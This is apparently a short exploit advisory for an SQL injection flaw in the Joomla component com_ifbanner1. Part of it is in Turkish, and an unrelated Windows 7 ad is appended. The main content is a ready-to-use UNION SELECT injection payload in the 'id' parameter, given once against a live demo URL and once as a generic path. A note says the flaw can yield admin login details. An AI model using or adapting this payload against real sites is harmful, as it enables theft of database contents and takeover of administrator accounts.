<------------------- header data start ------------------- > ############################################################# Joomla Component com_ifbanner1 SQL injection Vulnerability ############################################################# # author : Fl0riX # Home : www.Cyber-Warrior.org # Greetz : Deep-Power,Pyske # Name : com_ifbanner1 # Bug Type : SQL Injection # Infection : Admin login bilgileri alınabilir. # Demo Vuln. : http://ifbanner.demo.joomlaif.com/index.php?option=com_ifbanner1&view=banner&id=null/**/union/**/select/**/user(),user(),user(),user(),user(),user(),7,8,user(),user(),user(),user(),user() # NOTE : Sorry could not reflect the column :( # Bug Fix Advice : Zararlı karakterler filtrelenmelidir. Kimsesizliğim O Dereceye Vardı Ki Çevremde Bela Girdabından Başka Dönen Kimse Yok.(!) # Note 2: I LOVE JOOMLA AND CW ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > path/index.php?option=com_ifbanner1&view=banner&id=null/**/union/**/select/**/user(),user(),user(),user(),user(),user(),7,8,user(),user(),user(),user(),user() < -- bug code end of -- > _________________________________________________________________ Yeni Windows 7: Size en uygun bilgisayarı bulun. Daha fazla bilgi edinin. http://windows.microsoft.com/shop